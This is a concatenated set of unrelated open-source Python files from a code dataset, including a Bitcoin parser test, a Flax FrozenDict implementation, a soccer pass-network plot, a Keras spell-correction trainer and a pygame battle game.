with open(config_path) as config_file:
config = yaml.load(config_file.read())
settings = config.get('cloud')
if not settings:
return
return settings.get(config_option)
def get_cluster_image_identifier(framework, region):
"""Return the identifier for the latest cluster node image"""
cluster_image = get_from_config('cluster_image')
if cluster_image:
# The data returned in this code path has built in knowledge
# about the information consumed by the client from the
# full pint data
image_data = {}
image_data['id'] = cluster_image
image_data['name'] = cluster_image
if framework == 'microsoft' and cluster_image.count(':') == 3:
image_data['urn'] = cluster_image
msg = 'Using cluster image from configuration. '
msg += 'Image data for cluster node image: "%s"'
logging.info(msg % image_data)
return image_data
name_filter = 'name~caasp,name~cluster'
flavor = get_from_config('procurement_flavor')
if flavor == 'byos':
name_filter += ',name~byos'
else:
name_filter += ',name!byos'
version = get_caasp_release_version()
name_filter += ',name~' + version.replace('.', '-')
# The cluster image we choose depends on the admin node version,
# thus we cannot just query for active images. We need to get all
# images and then process accordingly.
try:
image_info = ifsrequest.get_image_data(
framework,
None,
'json',
region,
name_filter
)
except Exception as e:
logging.error('Pint server access failed: "%s"' % e.message)
# This message will bubble up through salt
return 'See /var/log/caasp_cloud_setup.log'
try:
image_data = json.loads(image_info)
available_images = image_data.get('images', [])
target_image = None
target_image_date = 0
for image in available_images:
image_name = image.get('name')
try:
date = int(RELEASE_DATE.match(image_name).group(1))
if date > target_image_date:
# If we have multiple images with the same date that
# match our filter criteria we have a serious data problem
# we cannot really recover, the first one wins
target_image = image
except Exception:
# Image name with no date stamp skip it
continue
except Exception as e:
logging.error('Could not load json data from pint: "%s"' % e.message)
# This message will bubble up through salt
return 'See /var/log/caasp_cloud_setup.log'
if not target_image:
logging.error('Could not determine image identifier for cluster node.')
logging.error('This implies that the pint server is unreachable or the '
'data is incomplete, please report the issue, exiting.')
sys.exit('pint lookup failed')
logging.info('Image data for cluster node image: "%s"' % target_image)
return target_image
def load_platform_module(platform_name):
mod = __import__('caaspadminsetup.%s' % platform_name, fromlist=[''])
return mod
| 2.359375 | 2 |
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py | simewu/bitcoin_researcher | 1 | 5027 | <filename>tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
# Copyright (C) 2015-2016 The bitcoin-blockchain-parser developers
#
# This file is part of bitcoin-blockchain-parser.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of bitcoin-blockchain-parser, including this file, may be copied,
# modified, propagated, or distributed except according to the terms contained
# in the LICENSE file.
import unittest
from datetime import datetime
from .utils import read_test_data
from blockchain_parser.block import Block
class TestBlock(unittest.TestCase):
def test_from_hex(self):
block_hex = read_test_data("genesis_block.txt")
block = Block.from_hex(block_hex)
self.assertEqual(1, block.n_transactions)
block_hash = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1" \
"b60a8ce26f"
self.assertEqual(block_hash, block.hash)
self.assertEqual(486604799, block.header.bits)
merkle_root = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
"b7afdeda33b"
self.assertEqual(merkle_root, block.header.merkle_root)
self.assertEqual(2083236893, block.header.nonce)
self.assertEqual(1, block.header.version)
self.assertEqual(1, block.header.difficulty)
self.assertEqual(285, block.size)
self.assertEqual(datetime.utcfromtimestamp(1231006505),
block.header.timestamp)
self.assertEqual("0" * 64, block.header.previous_block_hash)
for tx in block.transactions:
self.assertEqual(1, tx.version)
tx_hash = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
"b7afdeda33b"
self.assertEqual(tx_hash, tx.hash)
self.assertEqual(204, tx.size)
self.assertEqual(0, tx.locktime)
self.assertEqual(0xffffffff, tx.inputs[0].transaction_index)
self.assertEqual(0xffffffff, tx.inputs[0].sequence_number)
self.assertTrue("ffff001d" in tx.inputs[0].script.value)
self.assertEqual("0" * 64, tx.inputs[0].transaction_hash)
self.assertEqual(50 * 100000000, tx.outputs[0].value)
| 2.25 | 2 |
genegenie/admin/__init__.py | genegeniebio/genegenie-admin | 0 | 5028 | '''
DNA++ (c) DNA++ 2017
All rights reserved.
@author: neilswainston
'''
| 1.085938 | 1 |
tests/conftest.py | pkavousi/similar-users | 0 | 5029 | import os
import pandas as pd
import pytest
from user_similarity_model.config.core import DATASET_DIR, config
@pytest.fixture()
def sample_local_data():
"""AI is creating summary for sample_local_data
Returns:
[Dict]: This function returns a dictionary with CSV files which
in dataset folder. The data will be compared in tests against data
that are pulled from Azure PostgreSQL server.
"""
sample_data = {}
for file in config.app_config.csv_files:
sample_data[file[0:-4]] = pd.read_csv(os.path.join(DATASET_DIR, file))
return sample_data
| 2.421875 | 2 |
weather/apps.py | chrisjen83/rfb_weather_obs | 1 | 5030 | from django.apps import AppConfig
import logging
logger = logging.getLogger(__name__)
class WeatherConfig(AppConfig):
name = 'weather'
def ready(self):
from forecastUpdater import updater
updater.start()
| 1.976563 | 2 |
projects/django-filer/test.py | fleimgruber/python | 25 | 5031 | import filer
import tests
| 1.039063 | 1 |
examples/plots/plot_pass_network.py | DymondFormation/mplsoccer | 0 | 5032 | <reponame>DymondFormation/mplsoccer<filename>examples/plots/plot_pass_network.py
"""
============
Pass Network
============
This example shows how to plot passes between players in a set formation.
"""
import pandas as pd
from mplsoccer.pitch import Pitch
from matplotlib.colors import to_rgba
import numpy as np
from mplsoccer.statsbomb import read_event, EVENT_SLUG
##############################################################################
# Set team and match info, and get event and tactics dataframes for the defined match_id
match_id = 15946
team = 'Barcelona'
opponent = 'Alavés (A), 2018/19 La Liga'
event_dict = read_event(f'{EVENT_SLUG}/{match_id}.json', warn=False)
players = event_dict['tactics_lineup']
events = event_dict['event']
##############################################################################
# Adding on the last tactics id and formation for the team for each event
events.loc[events.tactics_formation.notnull(), 'tactics_id'] = events.loc[
events.tactics_formation.notnull(), 'id']
events[['tactics_id', 'tactics_formation']] = events.groupby('team_name')[[
'tactics_id', 'tactics_formation']].ffill()
##############################################################################
# Add the abbreviated player position to the players dataframe
formation_dict = {1: 'GK', 2: 'RB', 3: 'RCB', 4: 'CB', 5: 'LCB', 6: 'LB', 7: 'RWB',
8: 'LWB', 9: 'RDM', 10: 'CDM', 11: 'LDM', 12: 'RM', 13: 'RCM',
14: 'CM', 15: 'LCM', 16: 'LM', 17: 'RW', 18: 'RAM', 19: 'CAM',
20: 'LAM', 21: 'LW', 22: 'RCF', 23: 'ST', 24: 'LCF', 25: 'SS'}
players['position_abbreviation'] = players.player_position_id.map(formation_dict)
##############################################################################
# Add on the subsitutions to the players dataframe, i.e. where players are subbed on
# but the formation doesn't change
sub = events.loc[events.type_name == 'Substitution',
['tactics_id', 'player_id', 'substitution_replacement_id',
'substitution_replacement_name']]
players_sub = players.merge(sub.rename({'tactics_id': 'id'}, axis='columns'),
on=['id', 'player_id'], how='inner', validate='1:1')
players_sub = (players_sub[['id', 'substitution_replacement_id', 'position_abbreviation']]
.rename({'substitution_replacement_id': 'player_id'}, axis='columns'))
players = pd.concat([players, players_sub])
players.rename({'id': 'tactics_id'}, axis='columns', inplace=True)
players = players[['tactics_id', 'player_id', 'position_abbreviation']]
##############################################################################
# Add player position information to the events dataframe
# add on the position the player was playing in the formation to the events dataframe
events = events.merge(players, on=['tactics_id', 'player_id'], how='left', validate='m:1')
# add on the position the receipient was playing in the formation to the events dataframe
events = events.merge(players.rename({'player_id': 'pass_recipient_id'},
axis='columns'), on=['tactics_id', 'pass_recipient_id'],
how='left', validate='m:1', suffixes=['', '_receipt'])
##############################################################################
# Create dataframes for passes and player locations
# get a dataframe with all passes
mask_pass = (events.team_name == team) & (events.type_name == 'Pass')
to_keep = ['id', 'match_id', 'player_id', 'player_name', 'outcome_name', 'pass_recipient_id',
'pass_recipient_name', 'x', 'y', 'end_x', 'end_y', 'tactics_id', 'tactics_formation',
'position_abbreviation', 'position_abbreviation_receipt']
passes = events.loc[mask_pass, to_keep].copy()
print('Formations used by {} in match: '.format(team), passes['tactics_formation'].unique())
##############################################################################
# Filter passes by chosen formation, then group all passes and receipts to
# calculate avg x, avg y, count of events for each slot in the formation
formation = 433
passes_formation = passes[(passes.tactics_formation == formation) &
(passes.position_abbreviation_receipt.notnull())].copy()
passer_passes = passes_formation[['position_abbreviation', 'x', 'y']].copy()
recipient_passes = passes_formation[['position_abbreviation_receipt', 'end_x', 'end_y']].copy()
# rename columns to match those in passer_passes
recipient_passes.rename({'position_abbreviation_receipt': 'position_abbreviation',
'end_x': 'x', 'end_y': 'y'}, axis='columns', inplace=True)
# create a new dataframe containing all individual passes and receipts from passes_formation
appended_passes = pd.concat(objs=[passer_passes, recipient_passes], ignore_index=True)
average_locs_and_count = appended_passes.groupby('position_abbreviation').agg({
'x': ['mean'], 'y': ['mean', 'count']})
average_locs_and_count.columns = ['x', 'y', 'count']
##############################################################################
# Group the passes by unique pairings of players and add the avg player positions to this dataframe
# calculate the number of passes between each position (using min/ max so we get passes both ways)
passes_formation['pos_max'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].max(axis='columns')
passes_formation['pos_min'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].min(axis='columns')
passes_between = passes_formation.groupby(['pos_min', 'pos_max']).id.count().reset_index()
passes_between.rename({'id': 'pass_count'}, axis='columns', inplace=True)
# add on the location of each player so we have the start and end positions of the lines
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_min', right_index=True)
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_max', right_index=True,
suffixes=['', '_end'])
##############################################################################
# Calculate the line width and marker sizes relative to the largest counts
max_line_width = 18
max_marker_size = 3000
passes_between['width'] = passes_between.pass_count / passes_between.pass_count.max() * max_line_width
average_locs_and_count['marker_size'] = (average_locs_and_count['count']
/ average_locs_and_count['count'].max() * max_marker_size)
##############################################################################
# Set color to make the lines more transparent when fewer passes are made
min_transparency = 0.3
color = np.array(to_rgba('white'))
color = np.tile(color, (len(passes_between), 1))
c_transparency = passes_between.pass_count / passes_between.pass_count.max()
c_transparency = (c_transparency * (1 - min_transparency)) + min_transparency
color[:, 3] = c_transparency
##############################################################################
# Plotting
pitch = Pitch(pitch_type='statsbomb', orientation='horizontal',
pitch_color='#22312b', line_color='#c7d5cc', figsize=(16, 11),
constrained_layout=True, tight_layout=False)
fig, ax = pitch.draw()
pass_lines = pitch.lines(passes_between.x, passes_between.y,
passes_between.x_end, passes_between.y_end, lw=passes_between.width,
color=color, zorder=1, ax=ax)
pass_nodes = pitch.scatter(average_locs_and_count.x, average_locs_and_count.y, s=average_locs_and_count.marker_size,
color='red', edgecolors='black', linewidth=1, alpha=1, ax=ax)
for index, row in average_locs_and_count.iterrows():
pitch.annotate(row.name, xy=(row.x, row.y), c='white', va='center', ha='center', size=16, weight='bold', ax=ax)
title = ax.set_title("{} {} Formation vs {}".format(team, formation, opponent), size=28, y=0.97, color='#c7d5cc')
fig.set_facecolor("#22312b")
| 3.078125 | 3 |
jsfiddle_factory/__init__.py | andrewp-as-is/jsfiddle-factory.py | 0 | 5033 | <filename>jsfiddle_factory/__init__.py
__all__ = ['Factory']
import jsfiddle_build
import jsfiddle_github
import jsfiddle_generator
import jsfiddle_readme_generator
import getdirs
import getfiles
import os
import popd
import yaml
@popd.popd
def _build(path):
os.chdir(path)
jsfiddle_build.Build().save("build.html")
@popd.popd
def _init(path):
os.chdir(path)
isempty = len(os.listdir(path)) == 0
isfiddle = len(
list(filter(os.path.exists, ["demo.css", "demo.js", "demo.html"]))) > 0
if isempty or isfiddle:
jsfiddle_generator.JSFiddleRepo().create()
@popd.popd
def _readme(path):
os.chdir(path)
jsfiddle_readme_generator.Readme().save("README.md")
class Factory:
"""attrs: `path`. methods: `detox()`, `init()`, `build()`, `readme()`, `update_resources()`"""
path = None
def __init__(self, path=None):
if not path:
path = os.getcwd()
self.path = path
def build_html(self):
files = getfiles.getfiles(self.path)
matches = ["demo.html", "fiddle.html"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
_build(os.path.dirname(f))
def create_readme(self):
files = getfiles.getfiles(self.path)
matches = ["demo.html", "fiddle.html"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
_readme(os.path.dirname(f))
def init(self):
for path in getdirs.getdirs(self.path):
_init(path)
def detox(self):
renamed = True
while renamed:
renamed = False
for path in getdirs.getdirs(self.path):
relpath = os.path.relpath(path, os.getcwd())
new_relpath = jsfiddle_github.sanitize(relpath)
new_path = os.path.join(os.getcwd(), new_relpath)
ishidden = relpath[0] == "." and "%s." % os.sep not in relpath
if not ishidden and new_relpath != relpath:
os.rename(path, new_path)
print("%s -> %s" % (path, new_path))
renamed = True
break
def update_resources(self):
f = os.path.join(self.path, "resources.txt")
if not os.path.exists(f):
print("SKIP: %s NOT EXISTS" % f)
resources = list(filter(None, open(f).read().splitlines()))
files = getfiles.getfiles(self.path)
matches = ["demo.details", "fiddle.manifest"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
if os.path.exists(f):
data = yaml.load(open(f, 'r'))
if data.get("resources", []) != resources:
data["resources"] = resources
yaml.dump(data, open(f, 'w'), default_flow_style=False)
| 2.34375 | 2 |
spellnn/train.py | MartinXPN/SpellNN | 0 | 5034 | import logging
import os
from datetime import datetime
from inspect import signature, Parameter
from pathlib import Path
from pprint import pprint
from textwrap import dedent
from typing import Optional, Union
import fire
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN
from tensorflow.keras import Model
from spellnn import models
from spellnn.data import alphabet
from spellnn.data.alphabet import get_chars
from spellnn.data.processing import DataProcessor
from spellnn.data.util import nb_lines
from spellnn.layers.mapping import CharMapping
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # FATAL
logging.getLogger('tensorflow').setLevel(logging.FATAL)
class Gym:
def __init__(self):
self.train_dataset: Optional[tf.data.Dataset] = None
self.valid_dataset: Optional[tf.data.Dataset] = None
self.char2int: Optional[CharMapping] = None
self.model: Optional[Model] = None
self.nb_train_samples: int = 0
self.nb_valid_samples: int = 0
self.batch_size = 0
def construct_dataset(self, path: str, locale: str, batch_size: int = 32, validation_split: float = 0.3):
pprint(locals())
all_chars = [alphabet.START, alphabet.END] + get_chars(locale)
char_weights = [0.5 if c.isalpha() and c.islower() else
0.2 if c.isalpha() else
0.1 if c not in {alphabet.START, alphabet.END} else
0 for c in all_chars]
self.char2int = CharMapping(chars=all_chars, include_unknown=True)
data_processor = DataProcessor(locale=locale, char2id=self.char2int,
alphabet=all_chars, alphabet_weighs=char_weights)
print('Calculating number of lines in the file...', end=' ')
all_samples = nb_lines(path)
print(all_samples)
self.batch_size = batch_size
self.nb_train_samples = int((1 - validation_split) * all_samples)
self.nb_valid_samples = all_samples - self.nb_train_samples
dataset = tf.data.TextLineDataset(path)
self.train_dataset = dataset.take(self.nb_train_samples)
self.train_dataset = self.train_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
self.train_dataset = self.train_dataset.batch(batch_size, drop_remainder=True)
self.train_dataset = self.train_dataset.map(
lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32']))
self.train_dataset = self.train_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
self.train_dataset = self.train_dataset.repeat()
self.valid_dataset = dataset.skip(self.nb_train_samples)
self.valid_dataset = self.valid_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
self.valid_dataset = self.valid_dataset.batch(batch_size, drop_remainder=True)
self.valid_dataset = self.valid_dataset.map(
lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32']))
self.valid_dataset = self.valid_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
self.valid_dataset = self.valid_dataset.repeat()
return self
def create_model(self, name):
arguments = signature(getattr(models, name).__init__)
arguments = {k: v.default for k, v in arguments.parameters.items()
if v.default is not Parameter.empty and k != 'self'}
arguments['nb_symbols'] = len(self.char2int)
arg_str = ', '.join([f'{k}=' + str(v) if type(v) != str else f'{k}=' '"' + str(v) + '"'
for k, v in arguments.items()])
# print(arg_str)
exec(dedent(f'''
def create({arg_str}):
self.model = {name}(**locals())
return self
create.__name__ = {name}.__name__
create.__doc__ = {name}.__init__.__doc__
setattr(self, create.__name__, create)
'''), {'self': self, name: getattr(models, name), arg_str: arg_str})
return getattr(self, name)
def train(self, epochs: int, monitor_metric='val_acc', patience: int = 5,
steps_per_epoch: Union[int, str] = 'auto', validation_steps: Union[int, str] = 'auto',
log_dir: str = 'logs',
use_multiprocessing: bool = False):
pprint(locals())
log_dir = Path(log_dir).joinpath(datetime.now().replace(microsecond=0).isoformat())
model_path = Path(log_dir).joinpath('checkpoints').joinpath('best-model.h5py')
model_path = str(model_path)
if steps_per_epoch == 'auto':
steps_per_epoch = self.nb_train_samples // self.batch_size
if validation_steps == 'auto':
validation_steps = self.nb_valid_samples // self.batch_size
self.model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc'])
history = self.model.fit_generator(
self.train_dataset.as_numpy_iterator(), steps_per_epoch=steps_per_epoch,
validation_data=self.valid_dataset.as_numpy_iterator(), validation_steps=validation_steps,
epochs=epochs,
use_multiprocessing=use_multiprocessing, workers=os.cpu_count() - 1,
callbacks=[
TerminateOnNaN(),
TensorBoard(log_dir=log_dir),
ModelCheckpoint(model_path, monitor=monitor_metric, verbose=1, save_best_only=True),
EarlyStopping(monitor=monitor_metric, patience=patience),
])
return history.history
if __name__ == '__main__':
cli = Gym()
fire.Fire(cli)
| 2.15625 | 2 |
flax/core/frozen_dict.py | juliuskunze/flax | 0 | 5035 | <filename>flax/core/frozen_dict.py
# Copyright 2020 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Frozen Dictionary."""
from typing import TypeVar, Mapping, Dict, Tuple
from flax import serialization
import jax
K = TypeVar('K')
V = TypeVar('V')
@jax.tree_util.register_pytree_node_class
class FrozenDict(Mapping[K, V]):
"""An immutable variant of the Python dict."""
__slots__ = ('_dict', '_hash')
def __init__(self, *args, **kwargs):
self._dict = dict(*args, **kwargs)
self._hash = None
def __getitem__(self, key):
v = self._dict[key]
if isinstance(v, dict):
return FrozenDict(v)
return v
def __setitem__(self, key, value):
raise ValueError('FrozenDict is immutable.')
def __contains__(self, key):
return key in self._dict
def __iter__(self):
return iter(self._dict)
def __len__(self):
return len(self._dict)
def __repr__(self):
return 'FrozenDict(%r)' % self._dict
def __hash__(self):
if self._hash is None:
h = 0
for key, value in self.items():
h ^= hash((key, value))
self._hash = h
return self._hash
def copy(self, add_or_replace: Mapping[K, V]) -> 'FrozenDict[K, V]':
"""Create a new FrozenDict with additional or replaced entries."""
return type(self)(self, **unfreeze(add_or_replace))
def items(self):
for key in self._dict:
yield (key, self[key])
def pop(self, key: K) -> Tuple['FrozenDict[K, V]', V]:
"""Create a new FrozenDict where one entry is removed.
Example::
state, params = variables.pop('params')
Args:
key: the key to remove from the dict
Returns:
A pair with the new FrozenDict and the removed value.
"""
value = self[key]
new_dict = dict(self._dict)
new_dict.pop(key)
new_self = type(self)(new_dict)
return new_self, value
def unfreeze(self) -> Dict[K, V]:
return unfreeze(self)
def tree_flatten(self):
return (self._dict,), ()
@classmethod
def tree_unflatten(cls, _, data):
return cls(*data)
def freeze(xs: Dict[K, V]) -> FrozenDict[K, V]:
"""Freeze a nested dict.
Makes a nested `dict` immutable by transforming it into `FrozenDict`.
"""
# Turn the nested FrozenDict into a dict. This way the internal data structure
# of FrozenDict does not contain any FrozenDicts.
# instead we create those lazily in `__getitem__`.
# As a result tree_flatten/unflatten will be fast
# because it operates on native dicts.
xs = unfreeze(xs)
return FrozenDict(xs)
def unfreeze(x: FrozenDict[K, V]) -> Dict[K, V]:
"""Unfreeze a FrozenDict.
Makes a mutable copy of a `FrozenDict` mutable by transforming
it into (nested) dict.
"""
if not isinstance(x, (FrozenDict, dict)):
return x
ys = {}
for key, value in x.items():
ys[key] = unfreeze(value)
return ys
def _frozen_dict_state_dict(xs):
return {key: serialization.to_state_dict(value) for key, value in xs.items()}
def _restore_frozen_dict(xs, states):
return freeze(
{key: serialization.from_state_dict(value, states[key])
for key, value in xs.items()})
serialization.register_serialization_state(
FrozenDict,
_frozen_dict_state_dict,
_restore_frozen_dict)
| 2.421875 | 2 |
pybb/middleware.py | grigi/pybbm | 0 | 5036 | <reponame>grigi/pybbm
# -*- coding: utf-8 -*-
from django.utils import translation
from django.db.models import ObjectDoesNotExist
from pybb import util
from pybb.signals import user_saved
class PybbMiddleware(object):
def process_request(self, request):
if request.user.is_authenticated():
try:
# Here we try to load profile, but can get error
# if user created during syncdb but profile model
# under south control. (Like pybb.Profile).
profile = util.get_pybb_profile(request.user)
except ObjectDoesNotExist:
# Ok, we should create new profile for this user
# and grant permissions for add posts
user_saved(request.user, created=True)
profile = util.get_pybb_profile(request.user)
language = translation.get_language_from_request(request)
if not profile.language:
profile.language = language
profile.save()
if profile.language and profile.language != language:
request.session['django_language'] = profile.language
translation.activate(profile.language)
request.LANGUAGE_CODE = translation.get_language()
| 2.15625 | 2 |
streetlite/common/constants.py | s0h3ck/streetlite | 0 | 5037 | from enum import Enum
class CustomEnum(Enum):
@classmethod
def has_value(cls, value):
return any(value == item.value for item in cls)
@classmethod
def from_value(cls, value):
found_element = None
if cls.has_value(value):
found_element = cls(value)
return found_element
class Direction(CustomEnum):
EAST = 0x1
SOUTH = 0x2
WEST = 0x3
NORTH = 0x4
class Action(CustomEnum):
FLASH_RED = 0x32
GREEN = 0x33
FLASH_GREEN = 0x34
PEDESTRIAN = 0x35
EMERGENCY = 0x37
class Intersection(CustomEnum):
A = 0x62
B = 0x61
BOTH = 0x63
class Mode(CustomEnum):
LIVE = 0
SIMULATION = 1 | 3.328125 | 3 |
day5.py | achien/advent-of-code-2021 | 0 | 5038 | import fileinput
counts = {}
for line in fileinput.input():
line = line.strip()
p1, p2 = line.split('>')
p1 = p1[:-2]
x1, y1 = p1.split(',')
x1 = int(x1)
y1 = int(y1)
p2 = p2[1:]
x2, y2 = p2.split(',')
x2 = int(x2)
y2 = int(y2)
if x1 == x2:
dx = 0
elif x1 > x2:
dx = -1
else:
dx = 1
if y1 == y2:
dy = 0
elif y1 > y2:
dy = -1
else:
dy = 1
x = x1
y = y1
while True:
pt = (x, y)
counts[pt] = counts.get(pt, 0) + 1
if x == x2 and y == y2:
break
x += dx
y += dy
n = 0
for _, ct in counts.items():
if ct > 1:
n += 1
print(n) | 3.140625 | 3 |
meditation_example.py | sodapopinsky/dfk | 90 | 5039 | import logging
from web3 import Web3
import sys
import time
import meditation.meditation as meditation
if __name__ == "__main__":
log_format = '%(asctime)s|%(name)s|%(levelname)s: %(message)s'
logger = logging.getLogger("DFK-meditation")
logger.setLevel(logging.DEBUG)
logging.basicConfig(level=logging.INFO, format=log_format, stream=sys.stdout)
rpc_server = 'https://api.harmony.one'
logger.info("Using RPC server " + rpc_server)
private_key = None # set private key
account_address = '0x2E7669F61eA77F02445A015FBdcFe2DE47083E02'
gas_price_gwei = 10
tx_timeout_seconds = 30
w3 = Web3(Web3.HTTPProvider(rpc_server))
active_meditations = meditation.get_active_meditations(account_address, rpc_server)
logger.info("Pending meditation on address " + str(account_address) + ": "+str(active_meditations))
level = 1
hero_id = 1
required_runes = meditation.get_required_runes(level, rpc_server)
meditation.start_meditation(1, meditation.stat2id('strength'), meditation.stat2id('endurance'), meditation.stat2id('luck'),
meditation.ZERO_ADDRESS, private_key, w3.eth.getTransactionCount(account_address),
gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
hero_meditation = meditation.get_hero_meditation(hero_id, rpc_server)
logger.info("Pending meditation "+str(hero_meditation))
time.sleep(5)
meditation.complete_meditation(hero_id, private_key, w3.eth.getTransactionCount(account_address),
gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
| 2.03125 | 2 |
python/johnstarich/interval.py | JohnStarich/dotfiles | 3 | 5040 | <reponame>JohnStarich/dotfiles
import time
class Interval(object):
def __init__(self, delay_time: int):
self.delay_time = delay_time
self.current_time = 0
@staticmethod
def now():
return time.gmtime().tm_sec
def should_run(self) -> bool:
if self.current_time == 0:
self.current_time = Interval.now()
return True
return self.is_done()
def is_done(self) -> bool:
timestamp = Interval.now()
return self.current_time + self.delay_time < timestamp or \
self.current_time > timestamp
def start(self) -> int:
self.current_time = Interval.now()
return self.current_time
| 3.125 | 3 |
servers/python/coweb/bot/wrapper/object.py | opencoweb/coweb | 83 | 5041 | <filename>servers/python/coweb/bot/wrapper/object.py
'''
Copyright (c) The Dojo Foundation 2011. All Rights Reserved.
Copyright (c) IBM Corporation 2008, 2011. All Rights Reserved.
'''
# tornado
import tornado.ioloop
# std lib
import logging
import time
import weakref
import functools
# coweb
from .base import BotWrapperBase
log = logging.getLogger('coweb.bot')
class ObjectBotWrapper(BotWrapperBase):
def __init__(self, manager, botClass, serviceName, serviceToken, appData):
self.serviceName = serviceName
self.appData = appData
self._serviceToken = serviceToken
self._manager = weakref.proxy(manager)
self._bot = botClass(self, serviceName, appData)
self._ioLoop = tornado.ioloop.IOLoop.instance()
# asynchronously inform local manager we're ready
self.add_callback(self._manager.on_bot_ready,
serviceName, serviceToken, self)
def on_message(self, mtdName, *args):
'''Proxy messages from manager to bot impl.'''
try:
mtd = getattr(self._bot, mtdName)
except AttributeError:
# bot isn't listening for this message type
return
# keep sync with manager so we can catch exceptions, else exception
# fires in context of original request which is wrong, it's a bot
# error not a client error
try:
mtd(*args)
except Exception:
log.exception('bot error')
def reply(self, replyToken, data):
'''Sends a private reply to a requestor.'''
self._manager.on_bot_response(self.serviceName, replyToken, data)
def publish(self, data):
'''Sends a public reply to subscribes on a bot subchannel.'''
self._manager.on_bot_publish(self.serviceName, data)
def add_callback(self, callback, *args, **kwargs):
'''Schedule a callback in the main loop.'''
f = functools.partial(callback, *args, **kwargs)
self._ioLoop.add_callback(f)
def add_timer(self, delay, callback, *args, **kwargs):
'''Add a one-shot timer that schedules a main loop callback.'''
f = functools.partial(callback, *args, **kwargs)
return self._ioLoop.add_timeout(time.time() + delay, f)
def remove_timer(self, timer):
'''Remove a one-shot timer.'''
self._ioLoop.remove_timeout(timer)
| 1.648438 | 2 |
battle_tut5.py | lankotiAditya/RPG_battle_main | 22 | 5042 | import pygame
import random
pygame.init()
clock = pygame.time.Clock()
fps = 60
#game window
bottom_panel = 150
screen_width = 800
screen_height = 400 + bottom_panel
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption('Battle')
#define game variables
current_fighter = 1
total_fighters = 3
action_cooldown = 0
action_wait_time = 90
attack = False
potion = False
clicked = False
#define fonts
font = pygame.font.SysFont('Times New Roman', 26)
#define colours
red = (255, 0, 0)
green = (0, 255, 0)
#load images
#background image
background_img = pygame.image.load('img/Background/background.png').convert_alpha()
#panel image
panel_img = pygame.image.load('img/Icons/panel.png').convert_alpha()
#sword image
sword_img = pygame.image.load('img/Icons/sword.png').convert_alpha()
#create function for drawing text
def draw_text(text, font, text_col, x, y):
img = font.render(text, True, text_col)
screen.blit(img, (x, y))
#function for drawing background
def draw_bg():
screen.blit(background_img, (0, 0))
#function for drawing panel
def draw_panel():
#draw panel rectangle
screen.blit(panel_img, (0, screen_height - bottom_panel))
#show knight stats
draw_text(f'{knight.name} HP: {knight.hp}', font, red, 100, screen_height - bottom_panel + 10)
for count, i in enumerate(bandit_list):
#show name and health
draw_text(f'{i.name} HP: {i.hp}', font, red, 550, (screen_height - bottom_panel + 10) + count * 60)
#fighter class
class Fighter():
def __init__(self, x, y, name, max_hp, strength, potions):
self.name = name
self.max_hp = max_hp
self.hp = max_hp
self.strength = strength
self.start_potions = potions
self.potions = potions
self.alive = True
self.animation_list = []
self.frame_index = 0
self.action = 0#0:idle, 1:attack, 2:hurt, 3:dead
self.update_time = pygame.time.get_ticks()
#load idle images
temp_list = []
for i in range(8):
img = pygame.image.load(f'img/{self.name}/Idle/{i}.png')
img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
temp_list.append(img)
self.animation_list.append(temp_list)
#load attack images
temp_list = []
for i in range(8):
img = pygame.image.load(f'img/{self.name}/Attack/{i}.png')
img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
temp_list.append(img)
self.animation_list.append(temp_list)
self.image = self.animation_list[self.action][self.frame_index]
self.rect = self.image.get_rect()
self.rect.center = (x, y)
def update(self):
animation_cooldown = 100
#handle animation
#update image
self.image = self.animation_list[self.action][self.frame_index]
#check if enough time has passed since the last update
if pygame.time.get_ticks() - self.update_time > animation_cooldown:
self.update_time = pygame.time.get_ticks()
self.frame_index += 1
#if the animation has run out then reset back to the start
if self.frame_index >= len(self.animation_list[self.action]):
self.idle()
def idle(self):
#set variables to attack animation
self.action = 0
self.frame_index = 0
self.update_time = pygame.time.get_ticks()
def attack(self, target):
#deal damage to enemy
rand = random.randint(-5, 5)
damage = self.strength + rand
target.hp -= damage
#check if target has died
if target.hp < 1:
target.hp = 0
target.alive = False
#set variables to attack animation
self.action = 1
self.frame_index = 0
self.update_time = pygame.time.get_ticks()
def draw(self):
screen.blit(self.image, self.rect)
class HealthBar():
def __init__(self, x, y, hp, max_hp):
self.x = x
self.y = y
self.hp = hp
self.max_hp = max_hp
def draw(self, hp):
#update with new health
self.hp = hp
#calculate health ratio
ratio = self.hp / self.max_hp
pygame.draw.rect(screen, red, (self.x, self.y, 150, 20))
